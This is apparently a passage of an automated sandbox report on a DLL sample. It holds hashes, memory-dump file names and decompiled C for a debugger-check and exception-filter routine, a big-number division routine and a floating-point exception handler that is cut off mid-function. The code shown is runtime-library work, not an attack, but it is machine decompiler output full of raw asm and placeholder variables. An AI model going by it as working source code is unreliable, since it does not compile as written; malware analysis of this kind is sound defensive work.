Opcode Fuzzy Hash: c06554caffb3647e063839773b6138142028f94a20e7e477b960a53ab50d5070
Instruction Fuzzy Hash: 5B61BC75548297DBEF188F28CD86BBA7BB8EF05700F04806AEA25D6184F774D9C1CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5D8C3 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E6DA5D8C3(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x6da83014; // 0xa0d58914
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E6DA59FE1(_t41);
					_pop(_t61);
				}
				E6DA5B0A0(_t66,  &_v804, 0, 0x50);
				E6DA5B0A0(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E6DA59FE1(_t57);
				}
				return E6DA59B91(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x6da5d8c3
0x6da5d8c3
0x6da5d8c3
0x6da5d8ce
0x6da5d8d3
0x6da5d8d5
0x6da5d8dd
0x6da5d8df
0x6da5d8e2
0x6da5d8e7
0x6da5d8e7
0x6da5d8f3
0x6da5d906
0x6da5d914
0x6da5d91a
0x6da5d920
0x6da5d926
0x6da5d92c
0x6da5d932
0x6da5d938
0x6da5d93e
0x6da5d944
0x6da5d94a
0x6da5d951
0x6da5d958
0x6da5d95f
0x6da5d966
0x6da5d96d
0x6da5d974
0x6da5d975
0x6da5d97e
0x6da5d984
0x6da5d987
0x6da5d98d
0x6da5d99a
0x6da5d9a3
0x6da5d9ac
0x6da5d9b5
0x6da5d9c3
0x6da5d9c5
0x6da5d9da
0x6da5d9e6
0x6da5d9e9
0x6da5d9ee
0x6da5d9fb

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6DA5D9BB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6DA5D9C5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6DA5D9D2

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 6849ad8f848ccffb8ee9a4406952cedfaf29f9e5650d7a0ce1186de03438121e
Instruction ID: 7cd27ea2da3af5768d408eb0dd0dab413e8164220c3ac5c526c09573a66980c0
Opcode Fuzzy Hash: 6849ad8f848ccffb8ee9a4406952cedfaf29f9e5650d7a0ce1186de03438121e
Instruction Fuzzy Hash: FA31D37490522C9BCF21DF28D98878DBBB8BF08310F5041EAE51CA6250E7709B958F45

Uniqueness

Uniqueness Score: -1.00%

Function 6DA604A0 Relevance: 3.4, APIs: 2, Instructions: 449
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E6DA604A0(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				char _v540;
				signed int _v544;
				signed int* _t179;
				signed int _t181;
				intOrPtr _t182;
				signed int _t185;
				signed int* _t187;
				signed int _t189;
				unsigned int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t201;
				intOrPtr _t207;
				void* _t210;
				signed int _t212;
				signed int _t223;
				void* _t227;
				signed int _t230;
				intOrPtr* _t237;
				signed int _t238;
				signed int* _t239;
				signed int _t241;
				signed int _t243;
				signed int _t244;
				void* _t245;
				intOrPtr* _t246;
				signed int _t247;
				signed int _t252;
				unsigned int _t253;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				intOrPtr _t260;
				void* _t264;
				signed char _t270;
				intOrPtr* _t272;
				signed int _t276;
				signed int* _t277;
				signed int _t284;
				signed int _t285;
				signed int* _t288;
				signed int _t291;
				signed int _t293;
				intOrPtr* _t294;
				signed int _t298;
				signed int _t299;
				intOrPtr* _t300;
				signed int _t305;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t314;
				void* _t315;
				signed int _t316;
				signed int* _t323;
				signed int* _t325;
				signed int _t329;
				signed int _t331;
				signed int _t332;
				signed int _t334;
				void* _t335;
				signed int _t340;
				signed int _t345;
				intOrPtr* _t347;
				signed int* _t348;

				_t179 = _a4;
				_t329 =  *_t179;
				if(_t329 == 0) {
					L76:
					__eflags = 0;
					return 0;
				} else {
					_t237 = _a8;
					_t310 =  *_t237;
					_v72 = _t310;
					if(_t310 == 0) {
						goto L76;
					} else {
						_t4 = _t329 - 1; // 0x1cb
						_t252 = _t4;
						_v8 = _t252;
						_t311 = _t310 + 0xffffffff;
						if(_t311 != 0) {
							__eflags = _t311 - _t252;
							if(_t311 > _t252) {
								goto L76;
							} else {
								_t181 = _t252;
								_t284 = _t252 - _t311;
								__eflags = _t252 - _t284;
								if(_t252 < _t284) {
									L19:
									_t284 = _t284 + 1;
									__eflags = _t284;
								} else {
									_t345 =  &(_a4[1]);
									__eflags = _t345;
									_t272 = _t345 + _t252 * 4;
									_t46 = _t237 + 4; // 0x6da6df36
									_t347 = _t46 + _t311 * 4;
									while(1) {
										__eflags =  *_t347 -  *_t272;
										if(__eflags != 0) {
											break;
										}
										_t181 = _t181 - 1;
										_t347 = _t347 - 4;
										_t272 = _t272 - 4;
										__eflags = _t181 - _t284;
										if(_t181 >= _t284) {
											continue;
										} else {
											goto L19;
										}
										goto L20;
									}
									if(__eflags < 0) {
										goto L19;
									}
								}
								L20:
								__eflags = _t284;
								if(__eflags == 0) {
									goto L76;
								} else {
									_t182 = _a8;
									_t238 = _v72;
									_t331 =  *(_t182 + _t238 * 4);
									_t54 = _t238 * 4; // 0xffff256e
									_t253 =  *(_t182 + _t54 - 4);
									asm("bsr eax, esi");
									_v44 = _t331;
									_v36 = _t253;
									if(__eflags == 0) {
										_t312 = 0x20;
									} else {
										_t312 = 0x1f - _t182;
									}
									_v12 = _t312;
									_v40 = 0x20 - _t312;
									__eflags = _t312;
									if(_t312 != 0) {
										_t270 = _t312;
										_v36 = _v36 << _t270;
										_v44 = _t331 << _t270 | _t253 >> _v40;
										__eflags = _t238 - 2;
										if(_t238 > 2) {
											_t67 = _t238 * 4; // 0xe850ffff
											_t69 =  &_v36;
											 *_t69 = _v36 |  *(_a8 + _t67 - 8) >> _v40;
											__eflags =  *_t69;
										}
									}
									_t332 = 0;
									_v32 = 0;
									_t285 = _t284 + 0xffffffff;
									__eflags = _t285;
									_v80 = _t285;
									if(_t285 >= 0) {
										_t187 = _a4;
										_t256 = _t285 + _t238;
										_v48 = _t256;
										_v52 = _t187 + (_t285 + 1) * 4;
										_t189 = _t187 + _t256 * 4 + 0xfffffffc;
										__eflags = _t189;
										_v28 = _t189;
										do {
											__eflags = _t256 - _v8;
											if(_t256 > _v8) {
												_t257 = 0;
												__eflags = 0;
											} else {
												_t257 =  *(_t189 + 8);
											}
											_t291 =  *(_t189 + 4);
											_t241 = _t257;
											_t190 =  *_t189;
											_v76 = _t257;
											_v56 = 0;
											_v20 = _t190;
											__eflags = _t312;
											if(_t312 != 0) {
												_t298 = _t241;
												_t212 = E6DA71ED0(_t291, _v12, _t298);
												_t257 = _v12;
												_t241 = _t298;
												_t291 = _t190 >> _v40 | _t212;
												_t332 = _v20 << _t257;
												__eflags = _v48 - 3;
												_v20 = _t332;
												if(_v48 >= 3) {
													_t257 = _v40;
													_t332 = _t332 |  *(_v28 - 4) >> _t257;
													__eflags = _t332;
													_v20 = _t332;
												}
											}
											_push(_t241);
											_t191 = E6DA71E30(_t291, _t241, _v44, 0);
											_v56 = _t241;
											_t243 = _t191;
											_t334 = _t332 ^ _t332;
											_t192 = _t291;
											_v24 = _t243;
											_v16 = _t192;
											_t314 = _t257;
											_v68 = _t243;
											_v64 = _t192;
											_v56 = _t334;
											__eflags = _t192;
											if(_t192 != 0) {
												L37:
												_t244 = _t243 + 1;
												asm("adc eax, 0xffffffff");
												_t314 = _t314 + E6DA59C50(_t244, _t192, _v44, 0);
												asm("adc esi, edx");
												_t243 = _t244 | 0xffffffff;
												_t192 = 0;
												__eflags = 0;
												_v56 = _t334;
												_v24 = _t243;
												_v68 = _t243;
												_v16 = 0;
												_v64 = 0;
											} else {
												__eflags = _t243 - 0xffffffff;
												if(_t243 > 0xffffffff) {
													goto L37;
												}
											}
											__eflags = _t334;
											if(__eflags <= 0) {
												if(__eflags < 0) {
													goto L42;
												} else {
													__eflags = _t314 - 0xffffffff;
													if(_t314 <= 0xffffffff) {
														while(1) {
															L42:
															_v24 = _v20;
															_t210 = E6DA59C50(_v36, 0, _t243, _t192);
															__eflags = _t291 - _t314;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L45:
																_t192 = _v16;
																_t243 = _t243 + 0xffffffff;
																_v68 = _t243;
																asm("adc eax, 0xffffffff");
																_t314 = _t314 + _v44;
																__eflags = _t314;
																_v16 = _t192;
																asm("adc dword [ebp-0x34], 0x0");
																_v64 = _t192;
																if(_t314 == 0) {
																	__eflags = _t314 - 0xffffffff;
																	if(_t314 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t210 - _v24;
																if(_t210 <= _v24) {
																	break;
																} else {
																	goto L45;
																}
															}
															L49:
															_v24 = _t243;
															goto L50;
														}
														_t192 = _v16;
														goto L49;
													}
												}
											}
											L50:
											__eflags = _t192;
											if(_t192 != 0) {
												L52:
												_t258 = _v72;
												_t315 = 0;
												_t335 = 0;
												__eflags = _t258;
												if(_t258 != 0) {
													_t246 = _v52;
													_t201 = _a8 + 4;
													__eflags = _t201;
													_v56 = _t201;
													_v20 = _t258;
													do {
														_v8 =  *_t201;
														_t207 =  *_t246;
														_t264 = _t315 + _v68 * _v8;
														asm("adc esi, edx");
														_t315 = _t335;
														_t335 = 0;
														__eflags = _t207 - _t264;
														if(_t207 < _t264) {
															_t315 = _t315 + 1;
															asm("adc esi, esi");
														}
														 *_t246 = _t207 - _t264;
														_t246 = _t246 + 4;
														_t201 = _v56 + 4;
														_t143 =  &_v20;
														 *_t143 = _v20 - 1;
														__eflags =  *_t143;
														_v56 = _t201;
													} while ( *_t143 != 0);
													_t243 = _v24;
													_t258 = _v72;
												}
												__eflags = 0 - _t335;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L61:
														__eflags = _t258;
														if(_t258 != 0) {
															_t245 = 0;
															_t294 = _v52;
															_t340 = _a8 + 4;
															__eflags = _t340;
															_t316 = _t258;
															do {
																_t260 =  *_t294;
																_t151 = _t340 + 4; // 0x8d8b5959
																_t340 = _t151;
																_t294 = _t294 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t294 - 4)) = _t260 +  *((intOrPtr*)(_t340 - 4)) + _t245;
																asm("adc eax, 0x0");
																_t245 = 0;
																_t316 = _t316 - 1;
																__eflags = _t316;
															} while (_t316 != 0);
															_t243 = _v24;
														}
														_t243 = _t243 + 0xffffffff;
														asm("adc dword [ebp-0xc], 0xffffffff");
													} else {
														__eflags = _v76 - _t315;
														if(_v76 < _t315) {
															goto L61;
														}
													}
												}
												_t259 = _v48;
												_v8 = _t259 - 1;
											} else {
												__eflags = _t243;
												if(_t243 == 0) {
													_t259 = _v48;
												} else {
													goto L52;
												}
											}
											_t332 = _v32;
											_t312 = _v12;
											asm("adc esi, 0x0");
											_v32 = 0 + _t243;
											_t293 = _v80 - 1;
											_v52 = _v52 - 4;
											_t256 = _t259 - 1;
											_t189 = _v28 - 4;
											_v80 = _t293;
											_v48 = _t256;
											_v28 = _t189;
											__eflags = _t293;
										} while (_t293 >= 0);
									}
									_t239 = _a4;
									_t255 = _v8 + 1;
									_t185 = _t255;
									__eflags = _t185 -  *_t239;
									if(_t185 <  *_t239) {
										_t288 =  &(( &(_t239[1]))[_t185]);
										do {
											 *_t288 = 0;
											_t288 =  &(_t288[1]);
											_t185 = _t185 + 1;
											__eflags = _t185 -  *_t239;
										} while (_t185 <  *_t239);
									}
									 *_t239 = _t255;
									__eflags = _t255;
									if(_t255 != 0) {
										while(1) {
											__eflags = _t239[_t255];
											if(_t239[_t255] != 0) {
												goto L75;
											}
											_t255 = _t255 + 0xffffffff;
											__eflags = _t255;
											 *_t239 = _t255;
											if(_t255 != 0) {
												continue;
											}
											goto L75;
										}
									}
									L75:
									return _v32;
								}
							}
						} else {
							_t6 = _t237 + 4; // 0xfffff8a4
							_t299 =  *_t6;
							_v8 = _t299;
							if(_t299 != 1) {
								__eflags = _t252;
								if(_t252 != 0) {
									_t247 = 0;
									_v12 = 0;
									_t323 = 0;
									_v28 = 0;
									__eflags = _t252 - 0xffffffff;
									if(_t252 != 0xffffffff) {
										_t276 = _t252 + 1;
										__eflags = _t276;
										_t277 =  &(_t179[_t276]);
										_v32 = _t277;
										do {
											_push(_t247);
											_t227 = E6DA71E30( *_t277, _t323, _t299, 0);
											_v28 = _t247;
											_t247 = _v12;
											_t323 = _t277;
											_v64 = _t299;
											_v12 = 0 + _t227;
											_t299 = _v8;
											asm("adc ebx, 0x0");
											_t277 = _v32 - 4;
											_v32 = _t277;
											_t329 = _t329 - 1;
											__eflags = _t329;
										} while (_t329 != 0);
										_t179 = _a4;
									}
									_t36 =  &(_t179[1]); // 0x4
									_t348 = _t36;
									 *_t179 = 0;
									_v544 = 0;
									E6DA60928(_t348, 0x1cc,  &_v540, 0);
									_t223 = _v28;
									_t300 = _a4;
									__eflags = 0 - _t223;
									 *_t348 = _t323;
									asm("sbb ecx, ecx");
									 *(_t300 + 8) = _t223;
									__eflags =  ~0x00000000;
									 *_t300 = 0xbadbae;
									return _v12;
								} else {
									_t325 =  &(_t179[1]);
									 *_t179 = _t252;
									_v544 = _t252;
									E6DA60928(_t325, 0x1cc,  &_v540, _t252);
									_t230 = _t179[1];
									_t305 = _t230 % _v8;
									 *_t325 = _t305;
									__eflags = 0 - _t305;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_a4 =  ~0x00000000;
									return _t230 / _v8;
								}
							} else {
								 *_t179 = _t311;
								_v544 = _t311;
								E6DA60928( &(_t179[1]), 0x1cc,  &_v540, _t311);
								return _t179[1];
							}
						}
					}
				}
			}

0x6da604a5
0x6da604b0
0x6da604b5
0x6da6091d
0x6da60921
0x6da60927
0x6da604bb
0x6da604bb
0x6da604be
0x6da604c0
0x6da604c5
0x00000000
0x6da604cb
0x6da604cb
0x6da604cb
0x6da604ce
0x6da604d1
0x6da604d4
0x6da605fb
0x6da605fd
0x00000000
0x6da60603
0x6da60605
0x6da60607
0x6da60609
0x6da6060b
0x6da60635
0x6da60635
0x6da60635
0x6da6060d
0x6da60610
0x6da60610
0x6da60613
0x6da60616
0x6da60619
0x6da60620
0x6da60622
0x6da60624
0x00000000
0x00000000
0x6da60626
0x6da60627
0x6da6062a
0x6da6062d
0x6da6062f
0x00000000
0x6da60631
0x00000000
0x6da60631
0x00000000
0x6da6062f
0x6da60633
0x00000000
0x00000000
0x6da60633
0x6da60636
0x6da60636
0x6da60638
0x00000000
0x6da6063e
0x6da6063e
0x6da60641
0x6da60644
0x6da60647
0x6da60647
0x6da6064b
0x6da6064e
0x6da60651
0x6da60654
0x6da6065f
0x6da60656
0x6da6065b
0x6da6065b
0x6da60669
0x6da6066e
0x6da60671
0x6da60673
0x6da6067c
0x6da6067e
0x6da60685
0x6da60688
0x6da6068b
0x6da60693
0x6da60699
0x6da60699
0x6da60699
0x6da60699
0x6da6068b
0x6da6069c
0x6da6069e
0x6da606a5
0x6da606a5
0x6da606a8
0x6da606ab
0x6da606b1
0x6da606b4
0x6da606b8
0x6da606c1
0x6da606c4
0x6da606c4
0x6da606c7
0x6da606d0
0x6da606d0
0x6da606d3
0x6da606da
0x6da606da
0x6da606d5
0x6da606d5
0x6da606d5
0x6da606dc
0x6da606df
0x6da606e1
0x6da606e3
0x6da606e6
0x6da606ed
0x6da606f0
0x6da606f2
0x6da60700
0x6da60704
0x6da60709
0x6da6070e
0x6da60715
0x6da60717
0x6da60719
0x6da6071d
0x6da60720
0x6da60725
0x6da6072d
0x6da6072d
0x6da6072f
0x6da6072f
0x6da60720
0x6da60732
0x6da6073a
0x6da6073f
0x6da60744
0x6da60746
0x6da60748
0x6da6074a
0x6da6074d
0x6da60750
0x6da60752
0x6da60755
0x6da60758
0x6da6075b
0x6da6075d
0x6da60764
0x6da60769
0x6da6076c
0x6da60776
0x6da60778
0x6da6077a
0x6da6077d
0x6da6077d
0x6da6077f
0x6da60782
0x6da60785
0x6da60788
0x6da6078b
0x6da6075f
0x6da6075f
0x6da60762
0x00000000
0x00000000
0x6da60762
0x6da6078e
0x6da60790
0x6da60792
0x00000000
0x6da60794
0x6da60794
0x6da60797
0x6da607a0
0x6da607a0
0x6da607ae
0x6da607b1
0x6da607b6
0x6da607b8
0x00000000
0x00000000
0x6da607ba
0x6da607c1
0x6da607c1
0x6da607c4
0x6da607c7
0x6da607ca
0x6da607cd
0x6da607cd
0x6da607d0
0x6da607d3
0x6da607d7
0x6da607da
0x6da607dc
0x6da607df
0x00000000
0x00000000
0x6da607e1
0x6da607df
0x6da607bc
0x6da607bc
0x6da607bf
0x00000000
0x00000000
0x00000000
0x00000000
0x6da607bf
0x6da607e6
0x6da607e6
0x00000000
0x6da607e6
0x6da607e3
0x00000000
0x6da607e3
0x6da60797
0x6da60792
0x6da607e9
0x6da607e9
0x6da607eb
0x6da607f5
0x6da607f5
0x6da607f8
0x6da607fa
0x6da607fc
0x6da607fe
0x6da60803
0x6da60806
0x6da60806
0x6da60809
0x6da6080c
0x6da60810
0x6da60812
0x6da60827
0x6da60829
0x6da6082b
0x6da6082d
0x6da6082f
0x6da60831
0x6da60833
0x6da60835
0x6da60838
0x6da60838
0x6da6083c
0x6da6083e
0x6da60844
0x6da60847
0x6da60847
0x6da60847
0x6da6084b
0x6da6084b
0x6da60850
0x6da60853
0x6da60853
0x6da60858
0x6da6085a
0x6da6085c
0x6da60863
0x6da60863
0x6da60865
0x6da6086a
0x6da6086c
0x6da6086f
0x6da6086f
0x6da60872
0x6da60874
0x6da60874
0x6da60876
0x6da60876
0x6da6087b
0x6da60881
0x6da60885
0x6da60888
0x6da6088b
0x6da6088d
0x6da6088d
0x6da6088d
0x6da60892
0x6da60892
0x6da60895
0x6da60898
0x6da6085e
0x6da6085e
0x6da60861
0x00000000
0x00000000
0x6da60861
0x6da6085c
0x6da6089c
0x6da608a2
0x6da607ed
0x6da607ed
0x6da607ef
0x6da608a7
0x00000000
0x00000000
0x00000000
0x6da607ef
0x6da608aa
0x6da608b4
0x6da608b7
0x6da608ba
0x6da608c0
0x6da608c1
0x6da608c5
0x6da608c6
0x6da608c9
0x6da608cc
0x6da608cf
0x6da608d2
0x6da608d2
0x6da606d0
0x6da608dd
0x6da608e0
0x6da608e1
0x6da608e3
0x6da608e5
0x6da608ea
0x6da608f0
0x6da608f0
0x6da608f6
0x6da608f9
0x6da608fa
0x6da608fa
0x6da608f0
0x6da608fe
0x6da60900
0x6da60902
0x6da60904
0x6da60904
0x6da60908
0x00000000
0x00000000
0x6da6090a
0x6da6090a
0x6da6090d
0x6da6090f
0x00000000
0x00000000
0x00000000
0x6da6090f
0x6da60904
0x6da60911
0x6da6091c
0x6da6091c
0x6da60638
0x6da604da
0x6da604da
0x6da604da
0x6da604dd
0x6da604e3
0x6da60514
0x6da60516
0x6da6055b
0x6da6055d
0x6da60564
0x6da60566
0x6da60569
0x6da6056c
0x6da6056e
0x6da6056e
0x6da6056f
0x6da60572
0x6da60575
0x6da60575
0x6da6057f
0x6da60584
0x6da60589
0x6da6058c
0x6da60591
0x6da60598
0x6da6059b
0x6da6059e
0x6da605a1
0x6da605a4
0x6da605a7
0x6da605a7
0x6da605a7
0x6da605ac
0x6da605ac
0x6da605af
0x6da605af
0x6da605b2
0x6da605c0
0x6da605d1
0x6da605d6
0x6da605dc
0x6da605e1
0x6da605e3
0x6da605e5
0x6da605e9
0x6da605ef
0x6da605f1
0x6da605fa
0x6da60518
0x6da6051b
0x6da6051f
0x6da6052e
0x6da60534
0x6da60539
0x6da6053d
0x6da60548
0x6da6054a
0x6da6054c
0x6da60550
0x6da60553
0x6da6055a
0x6da6055a
0x6da604e5
0x6da604eb
0x6da604fb
0x6da60501
0x6da60513
0x6da60513
0x6da604e3
0x6da604d4
0x6da604c5

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f079999708376b5f2720b3917fcdf58b9afd395b9802391cf29447260dcc6ee3
Instruction ID: 74a1bb2f8bb26ed6c6a1d7ae4a26d5f0550013f98d1892ad6c53fe4777723260
Opcode Fuzzy Hash: f079999708376b5f2720b3917fcdf58b9afd395b9802391cf29447260dcc6ee3
Instruction Fuzzy Hash: 04F18175E0425ADFDF14CFA9C8906AEB7B1FF88314F158269D915AB380D7309A81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6DA65CF6 Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E6DA65CF6(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E6DA6632C(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E6DA66298(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
